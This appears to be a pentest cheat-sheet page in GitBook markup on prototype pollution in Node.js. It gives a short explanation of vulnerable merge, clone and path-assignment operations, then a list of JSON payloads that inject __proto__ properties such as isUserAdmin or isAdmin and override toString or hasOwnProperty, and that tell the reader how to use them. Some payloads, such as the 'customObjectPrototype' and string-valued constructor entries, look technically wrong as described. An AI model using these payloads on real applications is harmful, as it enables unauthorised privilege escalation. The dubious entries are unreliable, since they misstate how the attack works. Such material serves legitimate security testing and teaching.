# Prototype Pollution

Affects Node.js

{% hint style="info" %} <mark style="color:purple;">**Prototype pollution happens at some unsafe**</mark>**&#x20;**<mark style="color:orange;">**`merge`**</mark><mark style="color:purple;">**,**</mark>**&#x20;**<mark style="color:orange;">**`clone`**</mark><mark style="color:purple;">**,**</mark>**&#x20;**<mark style="color:orange;">**`extend`**</mark>**&#x20;**<mark style="color:purple;">**and**</mark>**&#x20;**<mark style="color:orange;">**`path assignment`**</mark>**&#x20;**<mark style="color:purple;">**operations on malicious**</mark>**&#x20;**<mark style="color:orange;">**`JSON`**</mark>**&#x20;**<mark style="color:purple;">**objects.**</mark>

* <mark style="color:purple;">**This is exploitable only when one of the following three operations is present:**</mark>
  * <mark style="color:red;">**`Object recursive merge`**</mark>
  * <mark style="color:red;">**`Property definition by path`**</mark>
  * <mark style="color:red;">**`Object clone`**</mark>
* <mark style="color:purple;">Some of the most popular libraries being affected are</mark> <mark style="color:orange;">**`lodash`**</mark> <mark style="color:purple;">and</mark> <mark style="color:orange;">**`Hoek`**</mark>
* <mark style="color:orange;">**`Templates`**</mark> <mark style="color:purple;">are a good target for prototype pollution.</mark>
{% endhint %}

<details>

<summary><mark style="color:purple;"><strong><code>Payloads</code></strong></mark></summary>

* <mark style="color:purple;">The most straightforward example of prototype pollution involves injecting the</mark> <mark style="color:orange;">**`__proto__`**</mark> <mark style="color:purple;">property, which affects all objects that inherit from</mark> <mark style="color:orange;">**`Object.prototype`**</mark><mark style="color:purple;">**.**</mark>

{% code title="This example adds the isUserAdmin property to the prototype chain:" overflow="wrap" %}

```json
{
  "__proto__": {
    "isUserAdmin": true
  }
}
```

{% endcode %}

{% code title="Also, you can directly manipulate Object.prototype by modifying the `__proto__` property. This could be done in objects passed to vulnerable code:" overflow="wrap" %}

```json
{
  "__proto__": {
    "toString": "malicious code"
  }
}
```

{% endcode %}

{% code title="If the application allows you to define properties via paths (e.g., obj.a.b):" overflow="wrap" %}

```json
{
  "a.b.__proto__.isHacked": true
}
```

{% endcode %}

{% code title="The constructor property is part of the prototype chain for JavaScript objects:" overflow="wrap" %}

```json
{
  "__proto__.constructor": "MaliciousFunction"
}
```

{% endcode %}

{% code title="The hasOwnProperty method is often used to check if an object has a property, but it can be overridden in the prototype:" overflow="wrap" %}

```json
{
  "__proto__.hasOwnProperty": false
}
```

{% endcode %}

{% code title="If an attacker can manipulate built-in objects' prototypes (like Array.prototype or Function.prototype), they could affect the behavior of all instances of those types:" overflow="wrap" %}

```json
{
  "__proto__.length": 1000
}
```

{% endcode %}

{% code title="If the application uses a templating engine and allows user input to be rendered without sanitization, an attacker might inject a prototype pollution payload directly via the template:" overflow="wrap" %}

```json
{
  "__proto__": {
    "isAdmin": true
  }
}
```

{% endcode %}

{% code title="You can directly inject properties into the prototype of custom classes or objects:" overflow="wrap" %}

```json
{
  "customObjectPrototype.isHacked": true
}
```

{% endcode %}

</details>
